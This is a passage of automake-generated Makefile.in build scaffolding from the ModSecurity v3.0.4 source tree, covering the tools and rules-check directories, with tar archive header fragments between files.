esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ subdir = tools ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = SOURCES = DIST_SOURCES = RECURSIVE_TARGETS = all-recursive check-recursive cscopelist-recursive \ ctags-recursive dvi-recursive html-recursive info-recursive \ install-data-recursive install-dvi-recursive \ install-exec-recursive install-html-recursive \ install-info-recursive install-pdf-recursive \ install-ps-recursive install-recursive installcheck-recursive \ installdirs-recursive pdf-recursive ps-recursive \ tags-recursive uninstall-recursive am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac RECURSIVE_CLEAN_TARGETS = mostlyclean-recursive clean-recursive \ distclean-recursive maintainer-clean-recursive am__recursive_targets = \ $(RECURSIVE_TARGETS) \ $(RECURSIVE_CLEAN_TARGETS) \ $(am__extra_recursive_targets) AM_RECURSIVE_TARGETS = $(am__recursive_targets:-recursive=) TAGS CTAGS \ distdir distdir-am am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags DIST_SUBDIRS = $(SUBDIRS) am__DIST_COMMON = $(srcdir)/Makefile.in DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) am__relativize = \ dir0=`pwd`; \ sed_first='s,^\([^/]*\)/.*$$,\1,'; \ sed_rest='s,^[^/]*/*,,'; \ sed_last='s,^.*/\([^/]*\)$$,\1,'; \ sed_butlast='s,/*[^/]*$$,,'; \ while test -n "$$dir1"; do \ first=`echo "$$dir1" | sed -e "$$sed_first"`; \ if test "$$first" != "."; then \ if test "$$first" = ".."; then \ dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \ dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \ else \ first2=`echo "$$dir2" | sed -e "$$sed_first"`; \ if test "$$first2" = "$$first"; then \ dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \ else \ dir2="../$$dir2"; \ fi; \ dir0="$$dir0"/"$$first"; \ fi; \ fi; \ dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \ done; \ reldir="$$dir2" ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ ACLOCAL_AMFLAGS = -I build SUBDIRS = \ rules-check # make clean CLEANFILES = # make maintainer-clean MAINTAINERCLEANFILES = \ Makefile.in all: all-recursive .SUFFIXES: $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign tools/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign tools/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs # This directory's subdirectories are mostly independent; you can cd # into them and run 'make' without going through this Makefile. # To change the values of 'make' variables: instead of editing Makefiles, # (1) if the variable is set in 'config.status', edit 'config.status' # (which will cause the Makefiles to be regenerated when you run 'make'); # (2) otherwise, pass the desired values on the 'make' command line. $(am__recursive_targets): @fail=; \ if $(am__make_keepgoing); then \ failcom='fail=yes'; \ else \ failcom='exit 1'; \ fi; \ dot_seen=no; \ target=`echo $@ | sed s/-recursive//`; \ case "$@" in \ distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ *) list='$(SUBDIRS)' ;; \ esac; \ for subdir in $$list; do \ echo "Making $$target in $$subdir"; \ if test "$$subdir" = "."; then \ dot_seen=yes; \ local_target="$$target-am"; \ else \ local_target="$$target"; \ fi; \ ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ || eval $$failcom; \ done; \ if test "$$dot_seen" = "no"; then \ $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \ fi; test -z "$$fail" ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-recursive TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ if ($(ETAGS) --etags-include --version) >/dev/null 2>&1; then \ include_option=--etags-include; \ empty_fix=.; \ else \ include_option=--include; \ empty_fix=; \ fi; \ list='$(SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ test ! -f $$subdir/TAGS || \ set "$$@" "$$include_option=$$here/$$subdir/TAGS"; \ fi; \ done; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-recursive CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-recursive cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ $(am__make_dryrun) \ || test -d "$(distdir)/$$subdir" \ || $(MKDIR_P) "$(distdir)/$$subdir" \ || exit 1; \ dir1=$$subdir; dir2="$(distdir)/$$subdir"; \ $(am__relativize); \ new_distdir=$$reldir; \ dir1=$$subdir; dir2="$(top_distdir)"; \ $(am__relativize); \ new_top_distdir=$$reldir; \ echo " (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir="$$new_top_distdir" distdir="$$new_distdir" \\"; \ echo " am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)"; \ ($(am__cd) $$subdir && \ $(MAKE) $(AM_MAKEFLAGS) \ top_distdir="$$new_top_distdir" \ distdir="$$new_distdir" \ am__remove_distdir=: \ am__skip_length_check=: \ am__skip_mode_fix=: \ distdir) \ || exit 1; \ fi; \ done check-am: all-am check: check-recursive all-am: Makefile installdirs: installdirs-recursive installdirs-am: install: install-recursive install-exec: install-exec-recursive install-data: install-data-recursive uninstall: uninstall-recursive install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-recursive install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: -test -z "$(CLEANFILES)" || rm -f $(CLEANFILES) distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-recursive clean-am: clean-generic clean-libtool mostlyclean-am distclean: distclean-recursive -rm -f Makefile distclean-am: clean-am distclean-generic distclean-tags dvi: dvi-recursive dvi-am: html: html-recursive html-am: info: info-recursive info-am: install-data-am: install-dvi: install-dvi-recursive install-dvi-am: install-exec-am: install-html: install-html-recursive install-html-am: install-info: install-info-recursive install-info-am: install-man: install-pdf: install-pdf-recursive install-pdf-am: install-ps: install-ps-recursive install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-recursive -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-recursive mostlyclean-am: mostlyclean-generic mostlyclean-libtool pdf: pdf-recursive pdf-am: ps: ps-recursive ps-am: uninstall-am: .MAKE: $(am__recursive_targets) install-am install-strip .PHONY: $(am__recursive_targets) CTAGS GTAGS TAGS all all-am check \ check-am clean clean-generic clean-libtool cscopelist-am ctags \ ctags-am distclean distclean-generic distclean-libtool \ distclean-tags distdir dvi dvi-am html html-am info info-am \ install install-am install-data install-data-am install-dvi \ install-dvi-am install-exec install-exec-am install-html \ install-html-am install-info install-info-am install-man \ install-pdf install-pdf-am install-ps install-ps-am \ install-strip installcheck installcheck-am installdirs \ installdirs-am maintainer-clean maintainer-clean-generic \ mostlyclean mostlyclean-generic mostlyclean-libtool pdf pdf-am \ ps ps-am tags tags-am uninstall uninstall-am .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/tools/rules-check/0000755000175000017500000000000013607066346020065 5ustar zimmerlezimmerlemodsecurity-v3.0.4/tools/rules-check/Makefile.in0000644000175000017500000006550613607066346022146 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ bin_PROGRAMS = modsec-rules-check$(EXEEXT) subdir = tools/rules-check ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = am__installdirs = "$(DESTDIR)$(bindir)" PROGRAMS = $(bin_PROGRAMS) am_modsec_rules_check_OBJECTS = \ modsec_rules_check-rules-check.$(OBJEXT) modsec_rules_check_OBJECTS = $(am_modsec_rules_check_OBJECTS) am__DEPENDENCIES_1 = modsec_rules_check_DEPENDENCIES = \ $(top_builddir)/src/.libs/libmodsecurity.la \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) AM_V_lt = $(am__v_lt_@AM_V@) am__v_lt_ = $(am__v_lt_@AM_DEFAULT_V@) am__v_lt_0 = --silent am__v_lt_1 = modsec_rules_check_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX \ $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=link $(CXXLD) \ 